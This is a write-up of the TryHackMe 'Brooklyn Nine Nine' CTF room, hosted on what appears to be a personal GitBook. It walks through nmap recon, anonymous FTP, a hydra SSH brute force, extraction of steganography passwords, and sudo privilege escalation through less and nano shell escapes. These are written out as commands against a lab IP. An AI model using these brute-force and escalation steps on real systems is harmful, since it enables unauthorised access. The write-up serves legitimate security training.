📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
      • Random
Powered by GitBook
On this page
  • Reconnaissance
  • Enumeration
  • Port 21: FTP
  • Port 80: HTTP
  • Exploitation
  • FTP
  • HTTP
  • Privilege Escalation
  • Jake
  • Holt

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

Brooklyn Nine Nine

PreviousGaming ServerNextWgel CTF

Last updated 3 years ago

Was this helpful?

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.146.230

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,22,80

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.146.230

Enumeration

Port 21: FTP

Looks like we can login through ftp as anonymous, lets do that. (We use anonymous for both username and password or you can just hit enter for password)

ftp 10.10.146.230

Lets list the file in this directory

Looks like there is a file which is a note to a person called Jake, lets transfer this file to our machine and read what it has to say.

get note_to_jake.txt

Lets now read the file

Looks like Jake did not change his password as mentioned by a person called Amy. We also have a username Holt, we now have three usernames

Port 80: HTTP

Lets visit the website

Its a Brooklyn Nine Nine poster, lets look at the source code.

We have something interesting, they mention steganography, which is the practice of concealing a message within message. So lets download the image onto our machine, the name of the image is in the source code

wget http://10.10.146.230/brooklyn99.jpg

Exploitation

FTP

We can try to use hydra to find the password for Jake.

hydra -l jake -P /usr/share/wordlists/rockyou.txt http://10.10.146.230 ssh

We found the password, so lets login through ssh.

ssh jake@10.10.146.230

And we are logged in. We can find the user flag here.

HTTP

apt get install stegcracker

Now you can use stegcracker 

stegcracker brooklyn99.jpg

We have the password, this can be the password for the file. Lets see what the file is hiding

steghide --extract -sf brooklyn99.jpg

Now we have the password for Holt, lets login through ssh.

ssh holt@10.10.146.230

Privilege Escalation

Jake

Lets run sudo -l to see what Jake can run as root.

sudo -l

Looks like we can run the less command, with which we can see contents of files, so lets run the command to check what /root/root.txt contains.

sudo /usr/bin/less /root/root.txt

Lets use these commands to become root.

sudo less /etc/profile
!/bin/sh

Holt

Lets run sudo -l to see what Holt can run as root.

sudo -l

Lets run these commands

sudo nano
^R^X
reset; sh 1>&0 2>&0

We are now root. You can find the root flag in /root/

We can use a tool called to find hidden messages within files. If you do not have it you can download it with this command

We can also try to become root using the commands found in

We can nano as root, so lets go to to find the commands to escalate privilege's to root.

stegcracker
GTFOBins
GTFOBins